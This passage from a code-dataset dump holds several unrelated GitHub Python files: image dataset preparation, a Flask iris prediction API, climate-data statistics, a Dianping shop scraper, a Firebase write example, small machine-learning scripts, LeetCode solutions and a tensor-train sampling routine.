'gtFine')[:-4] + '_labelIds.png'\r\n image = np.array(Image.open(image))\r\n gt_im = np.array(Image.open(gt_im))\r\n red_x, red_y, green_x, green_y = find_tfl_lights(image, some_threshold=42)\r\n cropped_im = []\r\n labels = []\r\n i = 0\r\n susp_to_tfl = []\r\n for x, y in zip(red_x + green_x, red_y + green_y):\r\n if gt_im[y, x] == 19:\r\n i += 1\r\n cropped_im.append(crop_image(image, x, y))\r\n labels.append(1)\r\n else:\r\n susp_to_tfl.append((x, y))\r\n susp = min(i // 2, len(susp_to_tfl))\r\n for j in range(susp):\r\n cropped_im.append(crop_image(image, susp_to_tfl[j][0], susp_to_tfl[j][1]))\r\n labels.append(0)\r\n for k in range(i - susp):\r\n not_tfl = find_a_not_tfl(gt_im)\r\n cropped_im.append(crop_image(image, not_tfl[0], not_tfl[1]))\r\n labels.append(0)\r\n\r\n return cropped_im, labels\r\n\r\n\r\ndef bin_file(data, labels, path):\r\n data_array = np.array(data, dtype='uint8')\r\n f = open(f'db/Net dataset/{path}/data.bin', \"ab\")\r\n data_array.tofile(f)\r\n f.close()\r\n label_array = np.array(labels, dtype='uint8')\r\n f = open(f'db/Net dataset/{path}/labels.bin', \"ab\")\r\n label_array.tofile(f)\r\n f.close()\r\n\r\n\r\ndef prepare_set(path):\r\n set = f'./db/leftImg8bit/{path}/'\r\n\r\n set_images = glob.glob(os.path.join(set, '*/*_leftImg8bit.png'))\r\n cropped_im = []\r\n labels = []\r\n for im in set_images:\r\n image_cropped, image_labels = configure_image(im, path)\r\n cropped_im += image_cropped\r\n labels += image_labels\r\n bin_file(cropped_im, labels, path)\r\n\r\n\r\ndef show_label(path, index):\r\n data_file = np.memmap(f'db/Net dataset/{path}/data.bin', offset=index * (81 * 81 * 3), shape=(81, 81, 3))\r\n label_file = np.memmap(f'db/Net dataset/{path}/labels.bin', offset=index, shape=(1,))\r\n plt.imshow(data_file)\r\n if label_file == 0:\r\n plt.title(\"no traffic light\")\r\n else:\r\n plt.title(\"traffic light\")\r\n plt.show()\r\n print(label_file)\r\n\r\n\r\nif __name__ == '__main__':\r\n prepare_set('train')\r\n prepare_set('val')\r\n pass","repo_name":"Chavi100/Mobileye-project","sub_path":"part2/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"747528070","text":"from flask import Flask, jsonify, request\nimport pickle\n\napp=Flask(__name__)\n\nmodel=pickle.load(open('iris_reg.pkl','rb'))\n\n@app.route('/')\ndef status():\n return jsonify({'massage':'status active'})\n\n@app.route('/predict_sepal_length',methods=['POST'])\ndef sepal_length():\n data=request.get_json()\n print(data)\n SepalWidthCm=data['SepalWidthCm']\n print('SepalWidthCm : ',SepalWidthCm)\n PetalLengthCm=data['PetalLengthCm']\n print('PetalLengthCm:',PetalLengthCm)\n PetalWidthCm=data['PetalWidthCm']\n print('PetalWidthCm : ',PetalWidthCm)\n Species=data['Species']\n print('Species : ',Species)\n\n if Species=='Iris-setosa':\n Species=0\n elif Species=='Iris-versicolor':\n Species=1\n elif Species=='Iris-verginica':\n Species=2\n\n print('encoded species : ',Species)\n\n test_array=[SepalWidthCm,PetalLengthCm,PetalWidthCm,Species]\n prediction = model.predict([test_array])\n\n return jsonify ({'predicted sepal length is':prediction[0]})\n\nif __name__=='__main__':\n app.run(debug=True)\n","repo_name":"deshmukhpragat/mayproject","sub_path":"iris_reg.py","file_name":"iris_reg.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"72923604648","text":"\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 15 14:54:07 2021\n\n@author: yaoyichen\n\"\"\"\n\nimport os\nimport netCDF4 as nc\nimport numpy as np\nimport numpy.ma as ma\nimport matplotlib.pyplot as plt\nfrom radiation_copy import get_filedetail_from_folder\n\n\ndef fun1():\n\n \"\"\"\n Get the mean and variance of the different variables\n \"\"\"\n\n # nc_file = \"rrtmg4nn.nc\"\n # root_dir = \"/Users/yaoyichen\"\n # root_dir = \"../../data/radiation/\"\n\n\n # nc_file = \"rrtmg4nn.nc\"\n # root_dir = \"/Users/yaoyichen/dataset/radiation/MPAS/data_1day\"\n\n # nc_file = \"rrtmg4nn_00000.000.nc\"\n # root_dir = \"/Users/yaoyichen/dataset/radiation/MPAS/data_1year\"\n\n nc_file = \"/home/eason.yyc/data/radiation/fullyear_data/fullyear_trainset_20_5_useful.nc\"\n root_dir = \"\"\n\n\n full_file_path = os.path.join(root_dir, nc_file)\n df = nc.Dataset(full_file_path)\n\n variable_list = [\"aldif\", \"aldir\", \"asdif\", \"asdir\", \"cosz\", \"landfrac\", \"sicefrac\", \"snow\", \"solc\", \"tsfc\", \"emiss\", \"ccl4vmr\", \"cfc11vmr\", \"cfc12vmr\", \"cfc22vmr\",\n \"ch4vmr\", \"cldfrac\", \"co2vmr\", \"n2ovmr\", \"o2vmr\", \"o3vmr\", \"play\", \"qc\", \"qg\", \"qi\", \"qr\", \"qs\", \"qv\", \"tlay\", 'swuflx', 'swdflx', 'lwuflx', 'lwdflx']\n result = {}\n\n for variable_name in variable_list:\n\n data = df.variables[variable_name][:]\n if variable_name in [\"aldif\", \"aldir\", \"asdif\", \"asdir\", \"cosz\", \"solc\", \"swuflx\", \"swdflx\",\"swhr\"]:\n data[data < 0.0] = 0.0\n\n mean_value = ma.getdata(np.mean(data)).astype(float)\n scale_value = ma.getdata(np.std(data))\n stat = {\"mean\": float(mean_value), \"scale\": float(scale_value)}\n result[variable_name] = stat\n print(result)\n\n\ndef fun2():\n nc_file = \"rrtmg4nn.nc\"\n # root_dir = \"/Users/yaoyichen\"\n root_dir = \"../../data/radiation/\"\n\n full_file_path = os.path.join(root_dir, nc_file)\n df = nc.Dataset(full_file_path)\n\n temp = np.asarray(df.variables[\"ch4vmr\"]).astype(float)\n plt.hist(temp.max(axis=0), bins=200)\n\n\ndef fun3():\n \"\"\"\n Get all files under the folder\n \"\"\"\n source_folder = \"/home/eason.yyc/data/radiation/fullyear_data/\"\n endswith_str = None\n startswith_str = \"rrtmg\"\n\n file_mapping_source = get_filedetail_from_folder(source_folder, endswith_str = endswith_str, startswith_str = startswith_str)\n\n for key,value in file_mapping_source.items():\n print(key, value)\n \n\ndef fun4():\n \"\"\"\n Get all files under the folder\n \"\"\"\n source_folder = \"/home/eason.yyc/data/radiation/fullyear_data/\"\n endswith_str = None\n startswith_str = \"rrtmg\"\n\n file_mapping_source = get_filedetail_from_folder(source_folder, endswith_str = endswith_str, startswith_str = startswith_str)\n\n\n variable_list = [\"aldif\", \"aldir\", \"asdif\", \"asdir\", \"cosz\", \"landfrac\", \"sicefrac\", \"snow\", \"solc\", \"tsfc\", \"emiss\", \"ccl4vmr\", \"cfc11vmr\", \"cfc12vmr\", \"cfc22vmr\",\n \"ch4vmr\", \"cldfrac\", \"co2vmr\", \"n2ovmr\", \"o2vmr\", \"o3vmr\", \"play\", \"qc\", \"qg\", \"qi\", \"qr\", \"qs\", \"qv\", \"tlay\", 'swuflx', 'swdflx', 'lwuflx', 'lwdflx', 'swhr', 'lwhr']\n result = {}\n\n \n for key,value in file_mapping_source.items():\n \n df = nc.Dataset(key)\n\n for variable_name in variable_list:\n\n data = df.variables[variable_name][:]\n if variable_name in [\"aldif\", \"aldir\", \"asdif\", \"asdir\", \"cosz\", \"solc\", \"swuflx\", \"swdflx\",\"swhr\"]:\n data[data < 0.0] = 0.0\n\n mean_value = ma.getdata(np.mean(data)).astype(float)\n scale_value = ma.getdata(np.std(data))\n\n 
if(variable_name not in result):\n stat = {\"mean\": float(mean_value), \"scale\": float(scale_value), \"count\":1.0}\n result[variable_name] = stat\n\n else:\n result_mean = (result[variable_name][\"mean\"]* result[variable_name][\"count\"] + mean_value)/(result[variable_name][\"count\"] + 1.0) \n\n \"\"\"\n variance + absolute difference of the means\n \"\"\"\n result_std = (result[variable_name][\"scale\"]* result[variable_name][\"count\"] + scale_value)/(result[variable_name][\"count\"] + 1.0) + np.abs(result[variable_name][\"mean\"] - mean_value)/5.0\n\n result_count = result[variable_name][\"count\"] + 1.0\n \n stat = {\"mean\": float(result_mean), \"scale\": float(result_std), \"count\":result_count}\n result[variable_name] = stat\n\n\n print(result) \n\n\n\ndef fun_calculate_wrf_statistics():\n from make_wrfRRTMG_data import train_dict, WrfRRTMGDataset\n from config import norm_mapping_standard\n from torch.utils.data import Dataset, DataLoader\n import torch\n dateset = WrfRRTMGDataset(vertical_layers = 57, type = \"train\", norm_mapping= norm_mapping_standard)\n dataLoader = DataLoader(dataset= dateset)\n counter = 0\n for batch_idx, (feature, targets, auxis) in enumerate(dataLoader): \n if( batch_idx ==0):\n feature_mean = torch.mean(feature,dim = [0,1,3])\n targets_mean = torch.mean(targets,dim = [0,1,3])\n auxis_mean = torch.mean(auxis,dim = [0,1,3])\n else:\n feature_mean += torch.mean(feature,dim = [0,1,3])\n targets_mean += torch.mean(targets,dim = [0,1,3])\n auxis_mean += torch.mean(auxis,dim = [0,1,3])\n counter += 1\n\n print(feature_mean/counter)\n print(targets_mean/counter)\n print(auxis_mean/counter)\n\n\n\n feature_mean_unsqueeze = (feature_mean/counter).unsqueeze(0).unsqueeze(0).unsqueeze(-1)\n targets_mean_unsqueeze = (targets_mean/counter).unsqueeze(0).unsqueeze(0).unsqueeze(-1)\n auxis_mean_unsqueeze = (auxis_mean/counter).unsqueeze(0).unsqueeze(0).unsqueeze(-1)\n\n counter = 0\n for batch_idx, (feature, targets, auxis) in enumerate(dataLoader): \n if( batch_idx ==0):\n feature_mean = torch.mean(torch.square(feature - feature_mean_unsqueeze),dim = [0,1,3])\n targets_mean = torch.mean(torch.square(targets - targets_mean_unsqueeze),dim = [0,1,3])\n auxis_mean = torch.mean(torch.square(auxis - auxis_mean_unsqueeze) ,dim = [0,1,3])\n else:\n feature_mean += torch.mean(torch.square(feature - feature_mean_unsqueeze),dim = [0,1,3])\n targets_mean += torch.mean(torch.square(targets - targets_mean_unsqueeze),dim = [0,1,3])\n auxis_mean += torch.mean(torch.square(auxis - auxis_mean_unsqueeze) ,dim = [0,1,3])\n counter += 1\n\n print(torch.sqrt(feature_mean/counter))\n print(torch.sqrt(targets_mean/counter))\n print(torch.sqrt(auxis_mean/counter))\n \n\n\n\n\n \n\n\nif __name__ == \"__main__\":\n fun_calculate_wrf_statistics()\n","repo_name":"yaoyichen/radiationNet","sub_path":"utils/get_mean_std.py","file_name":"get_mean_std.py","file_ext":"py","file_size_in_byte":6686,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"22302635301","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 19 22:09:44 2018\n\n@author: hussain\n\"\"\"\n#%%\n# Python version\nimport sys\nprint('Python: {}'.format(sys.version))\n# scipy\nimport scipy\nprint('scipy: {}'.format(scipy.__version__))\n# numpy\nimport numpy\nprint('numpy: {}'.format(numpy.__version__))\n# matplotlib\nimport matplotlib\nprint('matplotlib: {}'.format(matplotlib.__version__))\n# pandas\nimport pandas\nprint('pandas: {}'.format(pandas.__version__))\n# 
scikit-learn\nimport sklearn\nprint('sklearn: {}'.format(sklearn.__version__))\n#%%\n# Import Dependencies\nimport pandas as pd \nfrom pandas.tools.plotting import scatter_matrix\nimport matplotlib.pyplot as plt \nfrom sklearn import model_selection \nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.svm import SVC\n\n\n#%%\n\n# Load Dataset \n\nURL = \"https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data\"\nnames = ['sepal-length', 'sepal-width', 'petal-length', 'petal-width', 'class']\ndataset = pd.read_csv(URL,names = names)\n\nprint(dataset.shape) \nprint(dataset.head(20))\nprint(dataset.describe())\n\nprint( dataset.groupby(\"sepal-length\").size())\n\n#%%\n# Data Viz\n\n# box and whisker \n\ndataset.plot(kind=box,layout= (2,2),sharex=False,sharey=False)\n\n#histogram\n\ndataset.hist()\n\n\n# Scatter Matrix \nscatter_matrix(dataset)\n\n\n#%%\n\n# Train Test Split \narray= dataset.values\nX = array[:,0:4]\nY = array[:,4]\nvalidation_size = 0.2\nseed = 7\nX_train,X_validation,Y_Train,Y_Validation = model_selection.train_test_split(X,Y,test_size=validation_size,random_state=seed)\n\n\n#%%\n\n#TEST HARNESS\n# Test Options and Evaluation Metric\n\nseed = 7 \nscoring = 'accuracy'\n\n#Building Models\n# Spot Check Algorithms\n\nmodels = []\nmodels.append(('LR',LogisticRegression()))\nmodels.append(('LDA',LinearDiscriminantAnalysis()))\nmodels.append(('KNN',KNeighborsClassifier()))\nmodels.append(('CART',DecisionTreeClassifier()))\nmodels.append(('NB',GaussianNB()))\nmodels.append(('SVM',SVC()))\n\nnames= []\nresults = []\nfor name,model in models:\n kfold=model_selection.KFold(n_splits = 10,random_state=seed)\n cv_results = model_selection.cross_val_score(model,X_train,Y_Train,cv=kfold)\n results.append(cv_results)\n names.append(name)\n msg = \"ModelName:%s ,Mean:%f, Std_dev(%f)\"%(name,cv_results.mean(),cv_results.std())\n print(msg)\n#%%\n# Compare Algorithms Graphically \n\nfig = plt.figure()\nfig.suptitle('Plot of Algo Comparison')\nax = fig.add_subplot(111)\nplt.boxplot(results)\nax.set_xticklabels(names)\nplt.show()\n\n#%%\n# SVM algorithm gives the best cross validation accuracy \n# Make Predictions on Validation Set\n\nSVM = SVC()\nSVM.fit(X_train,Y_Train) # Model Training\npredictions = SVM.predict(X_validation) # Model Prediction \nprint(accuracy_score(Y_Validation,predictions)) # % Accuracy \nprint(confusion_matrix(Y_Validation,predictions)) \nprint(classification_report(Y_Validation,predictions))\n\n# Done\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"hussainliyaqatdar/pythonprojects","sub_path":"Iris_Dataset_Classifier.py","file_name":"Iris_Dataset_Classifier.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42723280677","text":"# -*- coding: utf-8 -*-\nimport json\nimport os\nimport re\nimport time\nimport os\nimport json\nfrom scrapy.selector import Selector\nimport requests\n\nurl = 'https://m.dianping.com/shop/92040324'\nheaders = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, 
deflate',\n 'Accept-Language': 'en',\n # 'DNT': '1',\n 'Host': 'm.dianping.com',\n 'User-Agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Mobile Safari/537.36'\n}\ncurrent_path = os.path.dirname(__file__)\nparent_path = os.path.dirname(os.path.dirname(current_path))\npath = './data/search.add.2'\ncount = 0\nsession = requests.session()\nimport random\n\nwhile 1:\n try:\n time.sleep(2)\n session = requests.session()\n session.get('https://m.dianping.com/', headers=headers, timeout=3)\n print('retrying....')\n break\n except Exception as e:\n print(e)\n time.sleep(2)\n continue\n\nwith open('./data/detail.{}'.format(str(random.random())[-4:]),'w') as fw:\n with open(path, 'r') as f:\n line = f.readline()\n while line:\n if count < 28774:\n count+=1\n print(count)\n line = f.readline()\n continue\n try:\n data = json.loads(line)\n except Exception:\n continue\n shop_id = data['shop_id']\n temp = re.sub('(p2.*)$', '', data['url'])\n page = re.findall('(p\\d+)', data['url'])\n if page:\n temp += page[-1]\n headers['Referer'] = 'http://m.dianping.com/alashan/ch10/g134r3592'\n # shop_id = '100091635'\n url = 'http://www.dianping.com/shop/{}'.format(shop_id)\n print(url)\n while 1:\n try:\n r = session.get(url, headers=headers,timeout=5)\n except Exception as e:\n print(e)\n time.sleep(2)\n continue\n break\n if r.url != url:\n while 1:\n try:\n time.sleep(2)\n session = requests.session()\n session.get('https://m.dianping.com/', headers=headers,timeout=3)\n print('retrying....',shop_id)\n break\n except Exception as e:\n print(e)\n time.sleep(2)\n continue\n line = line\n continue\n print(r.status_code)\n html = r.text\n print(r.url)\n tel = Selector(text=html).css('.tel::attr(href)').extract()\n print(tel)\n result = {\n 'phone_num' : [i.replace('tel:', '') for i in tel],\n 'shop_name' : data['shop_name'] , # name,\n 'city' : data['city'] , # city,\n 'district' : data['district'] , # district,\n 'map_poi' :data['map_poi'],\n 'shop_id' : data['shop_id'],\n 'rank_star' :data['rank_star'],\n 'region': data['region'] , # business district,\n 'area' :data['area'],\n 'address': data['address'] , # address,\n 'type' : data['type'], # industry,\n 'review_num' : data['review_num'],\n }\n print(result)\n fw.write(json.dumps(result,ensure_ascii=False))\n fw.write('\\n')\n fw.flush()\n time.sleep(0.5)\n line = f.readline()\n","repo_name":"Pineapple1996/dianping_pro","sub_path":"detail_spider_request.py","file_name":"detail_spider_request.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"71994861289","text":"import string \nclass Solution:\n def wordSubsets(self, words1: List[str], words2: List[str]) -> List[str]:\n \n def newDic():\n latters = [i for i in string.ascii_lowercase]\n dic = {}\n for char in latters:dic[char] = 0\n return dic\n \n def countfreq(word):\n dic = newDic()\n for char in word:dic[char] += 1\n return dic\n \n maxdic = newDic()\n \n for word in words2:\n curdic = countfreq(word)\n for char in curdic:maxdic[char] = max(maxdic[char],curdic[char])\n \n \n ans = []\n \n for word in words1:\n curdic = countfreq(word)\n curstring = \"\"\n maxstr = \"\"\n\n for char in maxdic:\n \n if int(curdic[char]) >= int(maxdic[char]) and maxdic[char] > 0: \n curstring += char\n \n \n if maxdic[char] > 0:\n maxstr += char\n \n if maxstr == curstring: ans.append(word)\n \n return 
ans","repo_name":"Atri10/Leet-code-Atri_Patel","sub_path":"916-word-subsets/916-word-subsets.py","file_name":"916-word-subsets.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"40140474491","text":"from firebase import firebase\nfrom firebase_admin import credentials, auth, db, storage\nimport firebase_admin\n\ncred = credentials.Certificate(\"files/butilka-firebase-adminsdk-tqp9f-dd117b3e5a.json\")\nfirebase_admin.initialize_app(cred, {'databaseURL': 'https://butilka-default-rtdb.firebaseio.com/'})\n\nusers_database = {\n \"1274981264\": {\n \"username\": \"user_1\",\n \"last_activity\": 1619212557\n },\n \"4254785764\": {\n \"username\": \"user_2\",\n \"last_activity\": 1603212638\n }\n}\n\ndb.reference(\"/users_database/\").set(users_database)\n\nuser_3_id = \"2148172489\"\nuser_3 = {\n \"username\": \"user_3\",\n \"last_activity\": 1603212638\n}\n\ndb.reference(\"/users_database/\" + user_3_id).set(user_3)\n\nprint(db.reference(\"/users_database/\").get())","repo_name":"F4VOUR1TE/7th_parallel","sub_path":"BASA trial.py","file_name":"BASA trial.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3758004016","text":"from typing import List\nimport numpy as np\nfrom nn.nn import NeuralNet\nfrom nn.layers import Linear, Tanh\nfrom nn.optim import Adam\nfrom nn.loss import CrossEntropyLoss\nfrom nn.train import train\n\n\ndef binary_encode(x: int) -> List[int]:\n return [x >> i & 1 for i in range(10)]\n\n\ndef fizz_buzz_encode(x: int) -> List[int]:\n if x % 15 == 0:\n return [0, 0, 0, 1]\n elif x % 5 == 0:\n return [0, 0, 1, 0]\n elif x % 3 == 0:\n return [0, 1, 0, 0]\n else:\n return [1, 0, 0, 0]\n\n\ndef predict(net: NeuralNet) -> None:\n \"\"\"\n 验证准确率\n \"\"\"\n num_correct = 0\n for x in range(1, 101):\n predicted = net(binary_encode(x))\n predicted_idx = np.argmax(predicted)\n actual_idx = np.argmax(fizz_buzz_encode(x))\n labels = [str(x), 'fizz', 'buzz', 'fizzbuzz']\n if predicted_idx == actual_idx:\n num_correct += 1\n print(\n f'x : {x} | 预测值 : {labels[predicted_idx]} | 正确值 : {labels[actual_idx]}')\n print(num_correct, '/ 100')\n\n\ninputs = np.array(\n [binary_encode(x) for x in range(101, 1024)]\n)\n\ntargets = np.array(\n [fizz_buzz_encode(x) for x in range(101, 1024)]\n)\n\nnet = NeuralNet([\n Linear(input_size=10, output_size=50),\n Tanh(),\n Linear(input_size=50, output_size=4)\n])\n# 训练\ntrain(net, inputs, targets, num_epochs=2000,\n optimizer=Adam(), loss=CrossEntropyLoss())\n# 预测\npredict(net)\n","repo_name":"daHaoShuai/autograd","sub_path":"nn_fizz_buzz.py","file_name":"nn_fizz_buzz.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35850158520","text":"# encoding=utf-8\n\n'''\n3Sum:\nGiven an array S of n integers, are there elements a, b, c in S such that a + b + c = 0?\nFind all unique triplets in the array which gives the sum of zero.\nNote: The solution set must not contain duplicate triplets.\nFor example, given array S = [-1, 0, 1, 2, -1, -4],\nA solution set is:\n[\n [-1, 0, 1],\n [-1, -1, 2]\n]\n'''\n\n\nclass Solution:\n def threeSum(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n nums = sorted(nums)\n m = len(nums)\n ans = []\n duplic = set()\n for i in range(m - 2):\n if i > 0 and nums[i] == nums[i - 1]: continue\n 
tupl = self.findTwoNums(nums[i + 1:], -nums[i])\n            for (a, b) in tupl:\n                if (a, b) not in duplic:\n                    ans.append((nums[i], a, b))\n                    duplic.add((a, b))\n        return ans\n\n    def findTwoNums(self, nums, target):\n        left = 0\n        right = len(nums) - 1\n        ans = []\n        while left < right:\n            if nums[left] + nums[right] == target:\n                ans.append((nums[left], nums[right]))\n                right -= 1\n                left += 1\n            elif nums[left] + nums[right] < target:\n                left += 1\n            else:\n                right -= 1\n        return ans\n\n\nif __name__ == '__main__':\n    s = Solution()\n    print(s.threeSum([-1, 0, 1, 2, -1, -4]))\n","repo_name":"feizhihui/LeetCode","sub_path":"page1/main15.py","file_name":"main15.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"18324060743","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File  : unittest_mock.py\n# @Author: Lizi\n# @Date  : 2020/12/21\n\nimport unittest\nfrom unittest import mock\nimport requests\n\n\nclass Mock(unittest.TestCase):\n    def setUp(self) -> None:\n        self.url = \"http://127.0.0.1/api/order/create/cc3bdda5c61ad0900474b6e095704105\"\n\n    def tearDown(self) -> None:\n        pass\n\n    def test_case_01(self):\n        data = {\n            \"real_name\": \"\",\n            \"phone\": \"\",\n            \"addressId\": 1,\n            \"useIntegral\": 0,\n            \"couponId\": 0,\n            \"payType\": \"yue\",\n            \"pinkId\": 0,\n            \"seckill_id\": 0,\n            \"combinationId\": 0,\n            \"bargainId\": 0,\n            \"from\": \"weixinh5\",\n            \"mark\": \"\",\n            \"shipping_type\": 1,\n            \"store_id\": 0\n        }\n        # build a mock response object\n        mock_res = requests.Response()\n        # set the status code\n        mock_res.status_code = 200\n        # set the returned body data\n        mock_res._content = {\"status\": 200, \"msg\": \"微信支付成功\",\n                             \"data\": {\"status\": \"SUCCESS\",\n                                      \"result\": {\"orderId\": \"wx160846682663298919\",\n                                                 \"key\": \"cc3bdda5c61ad0900474b6e095704105\"}}}\n        with mock.patch.object(requests, 'post', return_value=mock_res):\n            res = requests.post(self.url, data)\n            # the mocked body was set as a dict (json-like) rather than bytes, so res.text cannot be used; only res.content returns the body data\n            print(res.content)\n            return res.content\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"rage-vampire/Python","sub_path":"lizi_project/interface_test/mock/unittest_mock.py","file_name":"unittest_mock.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"41427865452","text":"import numpy as np\nimport scipy.linalg as sla\nimport scipy as sp\n#from distributions import Funnel\nimport matplotlib.pyplot as plt\n#from MALA import mala\nimport torch\nimport tntorch as tn\nimport pickle\n#from distributions import Funnel\n\n\n#w = tt.cross.rect_cross\n\ndef make_meshgrids_lin(dots, d, steps):\n    grids = []\n    for k in range(d):\n        start, end = dots[k]\n        grid = torch.linspace(start, end, steps[k], dtype=torch.float64)\n        grids.append(grid)\n    return grids\n\n\ndef TT_cross_density1(domain, density, y=None):\n    cross = tn.cross(function=density, domain=domain, function_arg=\"matrix\",\n                     rmax=20, kickrank=3, max_iter=10, device='cpu')\n    return cross\n\n\ndef linear_core_integration(alpha, block):\n    summation = (block[:, 1:(block.shape[1] - 1), :].sum(axis=1) +\n                 (block[:, (0, block.shape[1] - 1), :].sum(axis=1))) / 2\n    return alpha * summation\n\n\ndef SIRT_integration(blocks, grids):\n    # We need one Cholesky/QR-style factorization per core, accumulated right to left.\n    d = len(blocks)\n    Ps = [torch.tensor([1])] * d  # build P_k\n    Rprev = torch.tensor([1.]).reshape((1,1))\n    Ps[-1] = Rprev\n    for i in range(d-1, 0, -1):\n        block = 
blocks[i].clone().double()\n        block = torch.einsum('abi, ij -> abj', block, Rprev)\n        weight = torch.zeros(block.shape[1])\n        alphas = grids[i][1:] - grids[i][:-1]\n        weight[1:] += alphas\n        weight[:-1] += alphas\n        weight /= 2\n        weight = torch.sqrt(weight)\n        block = torch.einsum('abi, b-> abi', block, weight)\n        block = block.reshape((block.shape[0], -1)).T  # M = block.T block  Now let's do QR\n        R = torch.linalg.qr(block)[1].T\n        Ps[i-1] = R\n        Rprev = R\n    return Ps\n\n\n\ndef SIRT_sampling(blocks, seeds, grids):\n    d = len(blocks)\n    Ps = SIRT_integration(blocks, grids)\n    phis = [torch.zeros(1)] * (d + 1)\n    phis[0] = torch.ones((seeds.shape[0], 1), dtype=torch.float64)\n    # grid, distance = np.linspace(begin, end, k * (steps-1), retstep=True, endpoint=False)\n    ans = torch.zeros_like(seeds, dtype=torch.float64)\n    log_dens = torch.zeros(seeds.shape[0])\n    # print(linear_summation)\n    for i in range(d):\n        grid = grids[i]\n        block = blocks[i].double()\n        #assert np.all(~np.isnan(block))\n        G = torch.einsum('ai, ibc -> abc', phis[i].double(), block)\n        new_phi = torch.empty((seeds.shape[0], block.shape[-1]))\n        alphas = grid[1:] - grid[:-1]\n        for l in range(seeds.shape[0]):\n            marginal_pdf = ((G[l, ...] @ Ps[i].double())**2).sum(axis=-1)\n            sub_integral = torch.zeros(marginal_pdf.shape[0])\n            sub_integral[1:] += marginal_pdf[:-1]\n            sub_integral[1:] += marginal_pdf[1:]\n            sub_integral[1:] *= alphas/2\n            marginal_cdf = torch.cumsum(sub_integral, 0)\n            normalizing_constant = marginal_cdf[-1].item()\n            marginal_cdf /= normalizing_constant\n            marginal_pdf /= normalizing_constant\n            if l == 0 and i == 0:  # save the density for testing\n                np.save(f'normal_density_{i}.npy', np.concatenate([grid.reshape((-1, 1)),\n                                                                   marginal_pdf.reshape(-1, 1)], axis=1))\n            if False:\n                print(grid[\n                    torch.searchsorted(marginal_cdf, [0.1, 0.5, 0.9], side='left')\n                ])\n            q = seeds[l, i]\n            sort_pos = torch.searchsorted(marginal_cdf, q)\n            i1, i2 = sort_pos-1, sort_pos\n            pdf1, pdf2 = marginal_pdf[i1], marginal_pdf[i2]\n            cdf1, cdf2 = marginal_cdf[i1], marginal_cdf[i2]\n            x1, x2 = grid[i1], grid[i2]\n            pos = torch.searchsorted(grid, x1)\n            #if q < cdf1:\n            #    print(q, cdf1)\n            #elif q > cdf2:\n            #    print(q, cdf2)\n            #assert cdf1 == marginal_cdf[pos]\n            C = (q - cdf1)\n            D = 2 * C * (pdf1 - pdf2) + pdf1**2 * (x1 - x2)\n            D *= (x1-x2)\n            h = pdf1 - pdf2\n            if np.abs(h) >= 1e-10:\n                new_x = (pdf1 * x2 - pdf2 * x1 - torch.sqrt(np.abs(D)))/h\n            else:\n                new_x = x1 + C/pdf1\n            if new_x > x2:\n                new_x = x2\n            elif new_x < x1:\n                new_x = x1\n            linear_pi = block[:, i1, :] * (x2 - new_x) / (x2 - x1) + block[:, i2, :] * (new_x - x1) / (x2 - x1)\n            lin_pdf = pdf1 * (x2 - new_x) / (x2 - x1) + pdf2 * (new_x - x1) / (x2 - x1)\n            log_dens += torch.log(lin_pdf)\n            ans[l, i] = new_x\n            new_phi[l, :] = (phis[i][l, :].double()) @ (linear_pi)\n\n        phis[i + 1] = new_phi\n    return ans, log_dens\n\ndef SIRT_sample(F, q):\n    blocks = F[0]\n    grids = F[1]\n    return SIRT_sampling(blocks, q, grids)\n\ndef Banana(a, b):\n    def density(z):\n        d = z.shape[1]\n        even = np.arange(0, d, 2)\n        odd = np.arange(1, d, 2)\n\n        ll = (\n            -0.5 * (z[..., odd] - b * z[..., even] ** 2 + (a**2)*b) ** 2\n            - ((z[..., even]) ** 2) / (2 * a**2)\n        )\n        ll = (ll.sum(-1))/2 #+ 1\n        final = torch.exp(ll.double())\n        #print(final.max())\n        #print(ll.max(), ll.min())\n        return final\n\n    return density\n\ndef log_grad_Funnel1(a, b):\n    def 